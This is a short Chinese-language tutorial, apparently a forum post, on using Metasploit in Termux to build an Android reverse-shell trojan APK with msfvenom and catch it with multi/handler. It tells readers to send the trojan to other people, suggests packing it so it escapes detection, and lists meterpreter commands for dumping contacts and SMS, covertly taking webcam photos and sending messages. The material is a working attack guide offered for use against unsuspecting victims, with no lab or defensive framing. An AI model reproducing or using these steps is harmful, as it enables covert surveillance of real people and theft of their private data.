msfconsole使用教程
众所周知,msf是大家公认的神器!
现在我就来说说到底怎么用msf呢
有很多人说,他们不会安装msfconsole
教程:
http://bbs.huluxia.com/wap/thread/829605.html?para=37Hftt%2B137bfsd%2B037Xfst%2B03p%2FfuN%2By37nftt%2Bw37U%3D%0A&product=tool
安装了msfconsole之后,在termux输入:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.2.117 LPORT=5555 R > /sdcard/mu.apk
其中
LHOST= 后面的数字是本地的ip,不是被攻击者的ip而是你自己的
LPORT= 是端口,高端口不容易被报毒,如果你不知道端口是什么那就不要改了
生成的木马在根目录的mu.apk(啰嗦)
那么接下来,我来教大家怎么监听吧
1.启动msfconsole(漫长):msfconsole
2.使用multi模块:use exploit/multi/handler
3.设置LHOST(跟木马的一样):set LHOST 192.168.2.117
4.设置LPORT(一样的):set LPORT 5555
5.设置payload:set payload android/meterpreter/reverse_tcp
6.启动监听:exploit
最后将木马发给别人就行啦
很多人说一看就知道是木马了!
在这里我说一句,你不会加个壳嘛?
ok!当鱼上吊的时候,会反弹shell
命令:
dump_contacts 导出电话
dump_sms 导出信息
webcam_list 列出摄像头
webcam_stream 开启摄像
webcam_snap 偷拍一张照片
webcam_chat 视频通话
ps 列出所有进程
activity_start 启动其它应用
check_root 检查是否root
send_sms 发送指定信息
全部手机进行,免root进行
图片